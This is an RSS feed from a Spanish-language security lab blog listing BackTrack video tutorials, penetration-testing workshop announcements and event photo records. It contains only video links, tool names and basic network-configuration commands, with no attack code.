<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Labs DragonJAR &#187; Test de Penetración</title>
	<atom:link href="http://labs.dragonjar.org/tag/test-de-penetracion/feed" rel="self" type="application/rss+xml" />
	<link>http://labs.dragonjar.org</link>
	<description>Laboratorios de Seguridad Informática: Comunidad DragonJAR</description>
	<lastBuildDate>Sun, 06 Jun 2010 10:34:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Video tutoriales de introducción a BackTrack</title>
		<link>http://labs.dragonjar.org/video-tutoriales-de-introduccion-a-backtrack</link>
		<comments>http://labs.dragonjar.org/video-tutoriales-de-introduccion-a-backtrack#comments</comments>
		<pubDate>Mon, 08 Mar 2010 04:52:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Banner Identification]]></category>
		<category><![CDATA[Enumeración]]></category>
		<category><![CDATA[Ethical Hacking]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=870</guid>
		<description><![CDATA[El año pasado tuve la oportunidad y el placer de asistir como ponente en varias conferencias nacionales sobre diferentes temáticas relacionadas con la seguridad de la información. Una de ellas fue el evento que cada año lidera incansablemente Diego A Salazar: Securinf; en este evento participé con dos conferencias: Análisis de Malware sobre windows y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El año pasado tuve la oportunidad y el placer de asistir como ponente en varias conferencias nacionales sobre diferentes temáticas relacionadas con la seguridad de la información.</p>
<p style="text-align: justify;">Una de ellas fue el evento que cada año lidera incansablemente Diego A Salazar: <a href="http://securinf.com/" target="_blank"><strong>Securinf</strong></a>; en este evento participé con dos conferencias: Análisis de Malware sobre windows y un WorkShop de BackTrack.</p>
<p style="text-align: justify;">El objetivo de este post es publicar los video tutoriales que presenté ese día. Aunque son muy cortos y básicos pueden servir para quienes recién inician en este campo de la seguridad mediante el uso de la distribución BackTrack. También debe tenerse en cuenta que estos los realicé exclusivamente para un workshop, por lo tanto no tienen audio, pues están pensados en ir mostrando la herramienta e ir explicando su funcionamiento y configuración en vivo. Haré una recopilación de lo publicado hasta el momento sobre los laboratorios de BackTrack y luego los enlaces de descarga con una pequeña descripción de los videos presentados en la conferencia.</p>
<h3><a rel="bookmark" href="../video-tutorial-backtrack-introduccion-y-conceptos-basicos">Video Tutorial BackTrack, Introducción y Conceptos Básicos</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios">Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-instalacion-de-backtrack-4-pre-final">Video Tutorial: Instalación de BackTrack 4 (Pre-Final)</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final">Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)</a></h3>
<h3><a rel="bookmark" href="../video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final">Video Tutorial: Instalación de VMWare WorkStation en BackTrack 4 (Pre-Final)</a></h3>
<p style="text-align: justify;">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p style="text-align: justify;"><strong>Videos del WorkShop de Backtrack:</strong></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234959762/af2fea7b/Booteo_BackTrack.html" target="_blank">01- Booteo BackTrack (Creación y configuración de una máquina virtual en VirtualBox &#8211; Booteo inicial de BackTrack)</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234969634/7d59abec/Inicio_backtrack.html" target="_blank">02 &#8211; Ejecución inicial de BackTrack (Inicio del servicio de red, Inicio del servidor X, Cambio de contraseña, Rápido recorrido por el menú K)</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234981672/8ad25d53/BackTrack_Directorios_Servicio.html" target="_blank">03 &#8211; Recorrido por los directorios de herramientas contenidas en BackTrack -Web, Wireless, Passwords, Cisco, etc. Ejecución de servicios disponibles en BackTrack &#8211; HTTP, VNC, TFPT, etc.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234998735/317001f9/02-nmap.html" target="_blank">04 &#8211; Escaneo e identificación  de puertos y servicios con Nmap en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235037492/c4169002/BackTrack_AutoScan.html" target="_blank">05 &#8211; Escaneo automatizado de nuestra red con la herramienta AutoScan en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/234992970/4055fd1c/BackTrack_Maltego.html" target="_blank">06 &#8211; Information Gathering/Footprinting con Maltego en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235092743/79978813/BackTrack_Reversing.html" target="_blank">07 &#8211; Introducción al análisis básico de ejecutables con OllyDbg en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235115468/b8ce2d9d/cifrados_web.html" target="_blank">08 &#8211; Identificación de cifrados utilizados en la web con BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235070644/f308016d/DirBuster.html" target="_blank">09 &#8211; Escaneo e identificación de directorios y archivos sensibles en servidores web con DirBuster en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235130659/aa7e39f4/identificacion_servidor_web.html" target="_blank">10 &#8211; Identificación del servidor Web con netcat y httprint.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235075306/487f979c/nikto_wikto.html" target="_blank">11 &#8211; Escaneo e identificación de directorios y archivos sensibles en servidores Web con Nikto (BackTrack) y Wikto (Windows).</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235104319/1bd39c/spidering_wget.html" target="_blank">12 &#8211; Spidering con Wget en BackTrack.</a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/235086341/2292ff04/PenTest4.html" target="_blank">13 &#8211; Xhydra y John The Ripper en BackTrack.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutoriales-de-introduccion-a-backtrack/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Video Tutorial: Instalación de VMWare WorkStation en BackTrack 4 (Pre-Final)</title>
		<link>http://labs.dragonjar.org/video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final</link>
		<comments>http://labs.dragonjar.org/video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final#comments</comments>
		<pubDate>Sun, 23 Aug 2009 00:37:28 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=835</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)&#8220;. Quinto video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este Video tutorial veremos como llevar a cabo la instalación básica de VMWare WorkStation en BackTrack. Resumen: Descarga de aplicativo VMWare WorkStation (www.vmware.com/downloads). Ejecución de del archivo de instalación [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="../video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final">Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)</a>&#8220;.</p>
<p style="text-align: justify;">Quinto video tutorial dedicado al uso y configuración de la distribución <a href="http://labs.dragonjar.org/tag/backtrack" target="_blank">GNU/Linux BackTrack</a>.</p>
<p style="text-align: justify;">En este Video tutorial veremos como llevar a cabo la instalación básica de <a href="http://labs.dragonjar.org/tag/vmware" target="_blank">VMWare WorkStation</a> en <a href="http://labs.dragonjar.org/tag/backtrack" target="_blank">BackTrack</a>.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul style="text-align: justify;">
<li>Descarga de aplicativo <a href="http://labs.dragonjar.org/tag/vmware" target="_blank">VMWare WorkStation</a> (<a href="www.vmware.com/downloads" target="_blank">www.vmware.com/downloads</a>).</li>
<li>Ejecución de del archivo de instalación (sudo sh vmware_versión.bundle).</li>
<li>Ejecución de VMWare WorkStation y el proceso de VMWare Kernel Module Updater.</li>
</ul>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="672" height="542" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://blip.tv/play/AYGakm0A" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="672" height="542" src="http://blip.tv/play/AYGakm0A" allowfullscreen="true"></embed></object></p>
<p><strong><a href="http://www.4shared.com/file/126669258/b652773a/Inst_VMWare_BT_LabsDragonJARorg.html" target="_blank">Descargar video tutorial: Instalación de VMWare WorkStation en BackTrack</a> </strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-instalacion-de-vmware-workstation-en-backtrack-4-pre-final/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Video Tutorial: Configuración Básica de Red en BackTrack 4 (Pre-Final)</title>
		<link>http://labs.dragonjar.org/video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final</link>
		<comments>http://labs.dragonjar.org/video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final#comments</comments>
		<pubDate>Fri, 21 Aug 2009 12:23:27 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=827</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial: Instalación de BackTrack 4 (Pre-Final)&#8221;. Cuarto video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este video tutorial veremos diferentes métodos de configuración básica.para el acceso a internet/intranet. Resumen: Ejecución de la instrucción start-network. Instalación y ejecución de dhcpcd (dhcpcd nombre_interfaz#). Configuración manual: ifconfig interfaz IP route [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final" target="_blank">Video Tutorial: Instalación de BackTrack 4 (Pre-Final</a>)&#8221;.</p>
<p style="text-align: justify;">Cuarto video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.</p>
<p style="text-align: justify;">En este video tutorial veremos diferentes métodos de configuración básica.para el acceso a internet/intranet.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul style="text-align: justify;">
<li>Ejecución de la instrucción start-network.</li>
<li>Instalación y ejecución de dhcpcd (dhcpcd nombre_interfaz#).</li>
<li>Configuración manual:
<ul>
<li>ifconfig interfaz IP</li>
<li>route add default gw IP_gw</li>
<li>echo nameserver IP_gw &gt; /etc/resolv.conf</li>
</ul>
</li>
</ul>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="672" height="542" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://blip.tv/play/AYGZ3wcA" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="672" height="542" src="http://blip.tv/play/AYGZ3wcA" allowfullscreen="true"></embed></object></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/126662782/32e3a583/Config_Network_BT_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial: </strong></a><strong><a href="http://www.4shared.com/file/126662782/32e3a583/Config_Network_BT_LabsDragonJARorg.html" target="_blank">Configuración Básica de Red en BackTrack 4 (Pre-Final)</a> </strong>(<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-configuracion-basica-de-red-en-backtrack-4-pre-final/feed</wfw:commentRss>
		<slash:comments>24</slash:comments>
		</item>
		<item>
		<title>Video Tutorial: Instalación de BackTrack 4 (Pre-Final)</title>
		<link>http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final</link>
		<comments>http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final#comments</comments>
		<pubDate>Fri, 24 Jul 2009 02:26:53 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=813</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios&#8220;. Tercer video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este Video tutorial veremos como llevar a cabo la instalación de BackTrack 4 Pre-Final en un sistema en limpio (Disco duro completo). Resumen: Booteo de BackTrack. Ejecución de ubiquity. Particionamiento. Descargar [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios" target="_blank">Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios</a>&#8220;.</p>
<p style="text-align: justify;">Tercer video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.</p>
<p style="text-align: justify;">En este Video tutorial veremos como llevar a cabo la instalación de BackTrack 4 Pre-Final en un sistema en limpio (Disco duro completo).</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul style="text-align: justify;">
<li>Booteo de BackTrack.</li>
<li>Ejecución de ubiquity.</li>
<li>Particionamiento.</li>
</ul>
<p style="text-align: center;"><embed src="http://blip.tv/play/AYGTsh8A" type="application/x-shockwave-flash" width="640" height="510" allowscriptaccess="always" allowfullscreen="true"></embed></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/120199283/68ab42ac/BT4_iii_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial: Instalación de BackTrack 4 (Pre-Final)</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-instalacion-de-backtrack-4-pre-final/feed</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>Video Tutorial BackTrack: Booteo, Interfaz Gráfica y Directorios</title>
		<link>http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios</link>
		<comments>http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios#comments</comments>
		<pubDate>Thu, 23 Jul 2009 20:35:21 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=809</guid>
		<description><![CDATA[Continua desde &#8220;Video Tutorial BackTrack, Introducción y Conceptos Básicos&#8220;. Segundo video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack. En este Video tutorial veremos como iniciar con BackTrack en modo LiveDVD, conoceremos su interfaz gráfica y un primer acercamiento a las categorías de herramientas que esta incluye. Resumen: Descarga de BackTrack y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continua desde &#8220;<a href="http://labs.dragonjar.org/video-tutorial-backtrack-introduccion-y-conceptos-basicos" target="_blank">Video Tutorial BackTrack, Introducción y Conceptos Básicos</a>&#8220;.</p>
<p style="text-align: justify;">Segundo video tutorial dedicado al uso y configuración de la distribución GNU/Linux BackTrack.</p>
<p style="text-align: justify;">En este Video tutorial veremos como iniciar con BackTrack en modo LiveDVD, conoceremos su interfaz gráfica y un primer acercamiento a las categorías de herramientas que esta incluye.</p>
<p style="text-align: justify;"><strong>Resumen:</strong></p>
<ul>
<li>Descarga de BackTrack y grabación de la imagen.</li>
<li>Booteo de BackTrack.</li>
<li>Interfaz Gráfica de BackTrack.</li>
<li>Directorios de BackTrack.</li>
</ul>
<p style="text-align: center;"><embed src="http://blip.tv/play/AYGTqloA" type="application/x-shockwave-flash" width="640" height="510" allowscriptaccess="always" allowfullscreen="true"></embed></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/120148909/cde6d8f/BT_ii_LabsDragonJARorg.html" target="_blank"><strong>Descargar video tutorial BackTrack: booteo, interfaz gráfica y directorios</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-backtrack-booteo-interfaz-grafica-y-directorios/feed</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>Video tutorial de configuración del entorno virtualizado de intrusión &#8220;Sauron&#8221; en Linux</title>
		<link>http://labs.dragonjar.org/video-tutorial-de-configuracion-del-entorno-virtualizado-de-intrusion-sauron-en-linux</link>
		<comments>http://labs.dragonjar.org/video-tutorial-de-configuracion-del-entorno-virtualizado-de-intrusion-sauron-en-linux#comments</comments>
		<pubDate>Sat, 21 Mar 2009 19:32:41 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[HackLabs]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Sauron]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=683</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El siguiente video tutorial muestra el proceso necesario para llevar a cabo la instalación y configuración del Entorno Virtualizado de Intrusión conocido como Sauron en un Sistema Linux (Backtrack 4 con entorno gráfico Gnome).</p>
<p style="text-align: center;"><center>															<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/brUr50H3hv8&#038;hl=es&#038;fs=1&#038;rel=0"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/brUr50H3hv8&#038;hl=es&#038;fs=1&#038;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object>										</center></p>
<p style="text-align: justify;">De este entorno ya se ha hablado mucho en la web, por ello prefieron dejar los enlaces a más información al respecto, incluso los enlaces a los videso que publiqué sobre el desarrollo del mismo.</p>
<h3><a title="Enlace permanente a SecGame #1: Sauron" rel="bookmark" href="http://www.dragonjar.org/secgame-1-sauron.xhtml"> SecGame #1: Sauron</a></h3>
<h3><a title="Solución y seguimiento del HackTaller 01 DragonJAR (I de VIII)" href="../solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii">Solución y seguimiento del HackTaller 01 DragonJAR (I de VIII)</a></h3>
<h3><a title="Solución del HackTaller 01 DragonJAR (II de VIII)" href="../solucion-del-hacktaller-01-dragonjar-ii-de-viii">Solución del HackTaller 01 DragonJAR (II de VIII)</a></h3>
<h3><a title="Solución del HackTaller 01 DragonJAR (III de VIII)" href="../solucion-del-hacktaller-01-dragonjar-iii-de-viii">Solución del HackTaller 01 DragonJAR (III de VIII)</a></h3>
<h3><a title="Solución del HackTaller 01 DragonJAR (V de VIII)" href="../solucion-del-hacktaller-01-dragonjar-v-de-viii">Solución del HackTaller 01 DragonJAR (V de VIII)</a></h3>
<h3><a title="Solución del HackTaller 01 DragonJAR (VI de VIII)" href="../solucion-del-hacktaller-01-dragonjar-vi-de-viii">Solución del HackTaller 01 DragonJAR (VI de VIII)</a></h3>
<h3><a title="“Rooteo” a Sauron, solución alternativa" href="../rooteo-a-sauron-solucion-alternativa">“Rooteo” a Sauron, solución alternativa</a></h3>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-de-configuracion-del-entorno-virtualizado-de-intrusion-sauron-en-linux/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Registro Fotográfico del HackTaller 09 Medellín &#8211; PenTest / BackTrack 4</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-hacktaller-09-medellin-pentest-backtrack-4</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-hacktaller-09-medellin-pentest-backtrack-4#comments</comments>
		<pubDate>Tue, 17 Mar 2009 01:35:51 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=670</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Como siempre no queda más que agradecer a tod@s los asistentes de este 9° HackTaller realizado en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="HackLab 09 en Medellín" src="http://img16.imageshack.us/img16/5097/hacklab09.jpg" alt="" width="450" height="338" /></p>
<p style="text-align: justify;">Muchas gracias a todos por el mekato que me llevaron&#8230; aunque ya se me acabó XD.</p>
<p style="text-align: justify;"><span id="more-670"></span>Como especifiqué en la invitación, el HackTaller se dividió en dos secciones. Una sección dedicada a algunos conceptos de Test de Penetración y BackTrack 4 y una segunda sección dedicada al Test de Pentración como tal a un entorno virtualizado de intrusión.</p>
<p style="text-align: justify;">Dejo a continuación los enlaces al registro fotográfico del evento.</p>
<p style="text-align: justify;"><a href="http://picasaweb.google.es/4v4t4r/HackLab09EnMedellin" target="_blank"><strong>Registro fotográfico del HackLab 09 en Medellín &gt;&gt;</strong></a></p>
<p style="text-align: justify;"><a href="http://picasaweb.google.es/4v4t4r/HackLab09EnMedellin#slideshow" target="_blank"><strong>Registro fotográfico del HackLab 09 en Medellín en modo presentación &gt;&gt;</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-hacktaller-09-medellin-pentest-backtrack-4/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Registro Fotográfico del Hack Lab 08 en Medellín</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-08-en-medellin</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-08-en-medellin#comments</comments>
		<pubDate>Mon, 23 Feb 2009 19:24:09 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=631</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Como siempre muchas gracias a las personas que asistieron a este 8° Hack Lab en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="Hack Lab 08 en Medellín" src="http://img404.imageshack.us/img404/7732/hacklab08web.jpg" alt="" width="450" height="338" /></p>
<p>Próximamente estaré publicando todo el material utilizado en este HackTaller, incluyendo los videos, herramientas y entornos virtualizados de intrusión.</p>
<p>Pretendo también realizar este Hack Lab en modo virtual para permitirles a las personas interesadas de otras regiones la participación activa de este tipo de eventos.</p>
<p><a href="http://img26.imageshack.us/slideshow/player.php?id=img26/9690/1235412890qup.smil" target="_blank"><strong>A continuación dejo el registro fotográfico del evento.</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-08-en-medellin/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>HackTaller 08 Medellín &#8211; PenTest (Repetición)</title>
		<link>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion</link>
		<comments>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion#comments</comments>
		<pubDate>Thu, 19 Feb 2009 07:48:05 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=620</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Extiendo nuevamente la invitación a todos los interesados en participar de este 8° HackTaller a realizarse en la ciudad de Medellín.</p>
<p style="text-align: justify;">La idea es que a este Hack Lab puedan asistir las personas que se quedaron sin cupo en el anterior o que por uno u otro motivo no pudieron asistir.</p>
<p style="text-align: justify;">La temática para este HackLab será nuevamente Test de Penetración, pero está vez profundizando aún más en la dificultad del entorno de pruebas.</p>
<p style="text-align: justify;">El escenario propuesto para este Test de Penetración es el siguiente:</p>
<p style="text-align: justify;">Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.</p>
<p style="text-align: justify;">El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el hacklab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmandole la disponiblidad del espacio.</p>
<p style="text-align: justify;"><strong>4v4t4r @ gmail . com</strong></p>
<p style="text-align: justify;">Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.</p>
<p style="text-align: justify;">- Imágen de BackTrack 3 para máquina virtual. Este archivo puede ser descargado de manera directa desde el siguiente enlace. (<a href="http://174.36.1.2/bt3.7z">Descargar imágen de máquina virtual BackTrack 3</a>)<br />
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)<br />
- Cuaderno de notas<br />
<strong> &#8211; Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc&#8230;) INDISPENSABLE!!!</strong><br />
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias)<br />
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:</p>
<p style="text-align: justify;">- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión en Windows</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</a><br />
